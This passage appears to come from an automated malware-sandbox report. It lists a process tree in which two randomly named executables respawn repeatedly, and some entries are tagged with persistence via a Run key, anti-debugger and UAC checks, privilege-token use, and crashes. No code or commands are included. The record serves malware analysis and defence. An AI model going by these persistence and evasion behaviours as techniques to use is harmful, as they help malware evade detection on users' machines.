-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11092
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10664
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6928
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7000
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10760
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6460
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8040
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6620
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6444
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10320
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8208
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10840
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10532
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:3532
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:792
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10816
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:6276
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵
- Adds Run key to start application
PID:7824
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10196
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10236
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10516
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9604
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9948
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:5400
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9360
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6232
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7148
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8008
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:5280
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:5692
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8880
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:1564
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9916
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8180
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:5204
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6436
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2628
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11208 -s 2810⤵
- Program crash
PID:11136
-
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7284
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8984
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7500
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:4936
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11080
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:4504
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:3204
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2576
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9560
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2496
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10896
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6076
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:3948
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7860
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2016
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8532
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9364
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:4492
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:3944
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11500
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12968
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12992
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12044
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12996 -s 2810⤵
- Program crash
PID:2508
-
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9252
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10944
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8680
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2800
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10708
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6340
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:9804
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13832 -s 2810⤵
- Program crash
PID:13516
-
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:14332
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13912
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13504
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7372
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13980
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13484
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12704
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:10080
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11220
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:14016
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:4624
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:6188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 2810⤵
- Program crash
PID:11808
-
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:1288
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12096
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:7264
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12424
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12176
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12388
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:4084
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13212
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:496
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:8708
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11684
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12856
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13704
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13044
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2200
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:14800
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:14356
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:15316
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:11604
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:15000
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:2572
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12676 -s 2810⤵
- Program crash
PID:9556
-
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13216
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12828
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:15896
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:13168
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:16380
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:12468
-
-
C:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exeC:\Users\Admin\Documents\cffV7V85xgfY_2SwymHpsGHL.exe9⤵PID:16264
-
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe"C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe"8⤵PID:8248
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8556
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:4900
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9864
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:796
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10068
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6744
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6776
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6740
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:1296
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5720
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10112
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10028
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2392
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:7604
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9632
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10316
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10980
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9788
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10244
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8308 -s 2810⤵
- Program crash
PID:10416
-
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2584
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2960
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:7660
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9196
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:4312
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2460
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:9448
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6840
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:7484
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10316
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:1128
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5356
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:580
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8288
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5868
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:8716
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:10392
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5408
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:5736
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11056
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:6024
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2184
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:2208
-
-
C:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exeC:\Users\Admin\Documents\lncqVKD1n8Hm65KL2PVGDQde.exe9⤵PID:11160
-
-
